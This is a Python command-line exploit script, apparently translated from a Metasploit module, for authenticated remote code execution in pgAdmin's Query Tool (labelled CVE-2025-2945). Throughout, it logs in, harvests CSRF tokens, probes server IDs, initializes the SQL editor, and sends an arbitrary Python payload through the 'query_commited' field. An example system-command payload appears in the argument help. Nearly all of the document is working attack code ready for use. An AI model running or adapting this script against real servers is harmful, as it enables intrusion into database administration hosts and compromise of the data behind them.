#!/usr/bin/env python3
import argparse
import json
import random
import sys
from urllib.parse import urljoin, urlencode
import requests
from faker import Faker
''''
The attacker must possess valid pgAdmin credentials (username/password) to log in via POST /login
Translated from Metasploit module “pgAdmin Query Tool authenticated RCE (CVE-2025-2945)”
- Original Ruby: https://github.com/rapid7/metasploit-framework
- This Python script reproduces the same steps:
1) Authenticate to pgAdmin
2) Initialize the SQL editor (gets a transaction ID, sgid, sid, did)
3) Iterate over server IDs until one “works”
4) POST a malicious payload via `query_commited` → expected 500 response
'''
fake = Faker()
class PgAdminExploit:
def __init__(self, args):
self.rhost = args.rhost
self.rport = args.rport
self.username = args.username
self.password = args.password
self.db_user = args.db_user
self.db_pass = args.db_pass
self.db_name = args.db_name
self.max_server_id = args.max_server_id
self.payload = args.payload
self.scheme = "http"
self.base_url = f"{self.scheme}://{self.rhost}:{self.rport}"
self.session = requests.Session()
# Some default headers—Metasploit’s HttpClient sets things like a User-Agent, etc.
self.session.headers.update({
"User-Agent": "Mozilla/5.0 (Exploit Script)",
})
def get_csrf_token(self, from_page="/"):
"""
Attempt to pull CSRF token out of cookies or hidden fields.
pgAdmin4 often sets one of:
- a cookie named "pga_csrf_token" or "pgaCookieCsrfToken" or "csrftoken"
- a hidden in the login page
We first do a GET to `from_page` so that cookies get set.
"""
resp = self.session.get(urljoin(self.base_url, from_page), allow_redirects=True)
# 1) Try known cookie names:
for ck in ("pga_csrf_token", "pgaCookieCsrfToken", "csrftoken"):
if ck in self.session.cookies:
return self.session.cookies.get(ck)
# 2) Fallback: try to parse a hidden input from HTML
# (in many pgAdmin versions, login page has: )
text = resp.text
marker = 'name="csrf_token" value="'
idx = text.find(marker)
if idx != -1:
start = idx + len(marker)
end = text.find('"', start)
if end != -1:
return text[start:end]
print("[!] Unable to retrieve CSRF token. Exiting.")
sys.exit(1)
def authenticate(self):
"""
Replicates the `authenticate(datastore['USERNAME'], datastore['PASSWORD'])` call
in the Ruby module. We:
1) GET /login to retrieve CSRF
2) POST /login with form data {email, password, csrf_token}
"""
print("[*] Fetching CSRF token from login page...")
csrf_token = self.get_csrf_token("/login")
login_url = urljoin(self.base_url, "/login")
data = {
"email": self.username,
"password": self.password,
"csrf_token": csrf_token
}
headers = {
"Referer": login_url
}
resp = self.session.post(login_url, data=data, headers=headers, allow_redirects=False)
# pgAdmin typically redirects to /browser/ if login succeeds
if resp.status_code not in (302, 303):
print(f"[!] Login failed or unexpected status code: {resp.status_code}")
sys.exit(1)
print("[+] Authenticated to pgAdmin successfully.")
def get_post_data(self):
"""
Translated from `get_post_data` in Ruby:
title = Faker::App.name.downcase
selectedNodeInfo => { database: { id: Faker::App.name.downcase } }
return URI.encode_www_form(...)
"""
title = fake.app_name().lower()
db_id = fake.app_name().lower()
payload_dict = {
"title": title,
"selectedNodeInfo": {
"database": {
"id": db_id
}
}
}
# We return URL‐encoded form data (as a string)
return urlencode(payload_dict)
def post_initialize_sqleditor(self, trans_id, sgid, sid, did, csrf_token):
"""
Equivalent to Ruby:
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "/sqleditor/initialize/sqleditor/#{trans_id}/#{sgid}/#{sid}/#{did}"),
'method' => 'POST',
'keep_cookies' => true,
'ctype' => 'application/json',
'headers' => { 'X-pgA-CSRFToken' => csrf_token },
'data' => {
'user' => DB_USER,
'password' => DB_PASS,
'role' => '',
'dbname' => DB_NAME
}.to_json
})
"""
url = urljoin(self.base_url,
f"/sqleditor/initialize/sqleditor/{trans_id}/{sgid}/{sid}/{did}")
headers = {
"Content-Type": "application/json",
"X-pgA-CSRFToken": csrf_token
}
data = {
"user": self.db_user,
"password": self.db_pass,
"role": "",
"dbname": self.db_name
}
print(f"[*] Initializing SQL editor: trans_id={trans_id}, sgid={sgid}, sid={sid}, did={did}")
resp = self.session.post(url, headers=headers, json=data)
if resp.status_code != 200:
try:
err = resp.json().get("result", {}).get("errmsg", "unknown error")
except Exception:
err = resp.text or "unknown error"
print(f"[!] Failed to initialize sqleditor: {err}")
sys.exit(1)
print("[+] Successfully initialized sqleditor.")
def find_valid_server_id(self, sgid, csrf_token):
"""
Same as Ruby's find_valid_server_id(sgid):
for sid in 1..MAX_SERVER_ID:
GET /sqleditor/get_server_connection/{sgid}/{sid} with X-pgA-CSRFToken
if response.data.status → return sid
if none found, fail.
"""
for sid in range(1, self.max_server_id + 1):
print(f"[*] Trying server ID: {sid}")
url = urljoin(self.base_url,
f"/sqleditor/get_server_connection/{sgid}/{sid}")
headers = {
"X-pgA-CSRFToken": csrf_token,
"Content-Type": "application/x-www-form-urlencoded"
}
resp = self.session.get(url, headers=headers)
if resp.status_code != 200:
continue
try:
j = resp.json()
except ValueError:
continue
# Ruby does: if res&.get_json_document&.dig('data','status')
status = j.get("data", {}).get("status")
if status:
print(f"[+] Found valid server ID: {sid}")
return sid
print("[!] Failed to find a valid server ID. Try increasing MAX_SERVER_ID.")
sys.exit(1)
def sqleditor_init(self, trans_id, csrf_token):
"""
Ruby:
sgid = rand(1..10)
did = rand(10000..99999)
sid = find_valid_server_id(sgid)
post_initialize_sqleditor(trans_id, sgid, sid, did)
"""
sgid = random.randint(1, 10)
did = random.randint(10000, 99999)
sid = self.find_valid_server_id(sgid, csrf_token)
self.post_initialize_sqleditor(trans_id, sgid, sid, did, csrf_token)
# Return sgid, sid, did if needed later (not strictly required here)
return sgid, sid, did
def exploit(self):
"""
Puts it all together:
1) authenticate()
2) trans_id = rand(1_000_000..9_999_999)
3) sqleditor_init(trans_id)
4) POST to /sqleditor/query_tool/download/{trans_id} with JSON { query_commited: payload }
→ expects a 500 response
"""
self.authenticate()
# Step 1: Generate a fresh transaction ID
trans_id = random.randint(1_000_000, 9_999_999)
print(f"[*] Generated transaction ID: {trans_id}")
# Step 2: Get a fresh CSRF token (after login, cookies may have changed)
print("[*] Fetching a fresh CSRF token for sqleditor operations...")
csrf_token = self.get_csrf_token(f"/sqleditor/panel/{trans_id}?is_query_tool=true")
# Step 3: Initialize the SQL editor (find sgid/sid/did + POST that info)
self.sqleditor_init(trans_id, csrf_token)
# Step 4: Send the final exploit payload
print("[*] Exploiting the target by sending payload...")
exploit_url = urljoin(self.base_url, f"/sqleditor/query_tool/download/{trans_id}")
headers = {
"Content-Type": "application/json",
"X-PgA-CSRFToken": csrf_token,
# The Metasploit module also sent a Referer header:
"Referer": f"{self.base_url}/sqleditor/panel/{trans_id}?is_query_tool=true"
}
data = {
"query_commited": self.payload
}
resp = self.session.post(exploit_url, headers=headers, json=data, allow_redirects=False)
if resp is None:
print("[!] No response received from exploit attempt.")
sys.exit(1)
if resp.status_code == 500:
print("[+] Received a 500 response from the exploit attempt (expected).")
print("[+] If the payload is correct, remote code execution should have occurred.")
else:
print(f"[!] Received an unexpected response code: {resp.status_code}")
print(f" Response body:\n{resp.text}")
def main():
parser = argparse.ArgumentParser(description="pgAdmin Query Tool authenticated RCE (CVE-2025-2945) exploit in Python")
parser.add_argument("--rhost", required=True, help="Target pgAdmin host (IP or hostname)")
parser.add_argument("--rport", required=False, type=int, default=80, help="Target pgAdmin port (default: 80)")
parser.add_argument("--username", required=True, help="pgAdmin username")
parser.add_argument("--password", required=True, help="pgAdmin password")
parser.add_argument("--db-user", dest="db_user", required=True, help="Database user (to initialize SQL editor)")
parser.add_argument("--db-pass", dest="db_pass", required=True, help="Database password")
parser.add_argument("--db-name", dest="db_name", required=True, help="Database name")
parser.add_argument("--payload", required=True,
help="Arbitrary Python payload to send in `query_commited`. (e.g. \"__import__('os').system('id')\")")
parser.add_argument("--max-server-id", dest="max_server_id", type=int, default=10,
help="Maximum number of server IDs to try (default: 10)")
args = parser.parse_args()
exploit = PgAdminExploit(args)
exploit.exploit()
if __name__ == "__main__":
main()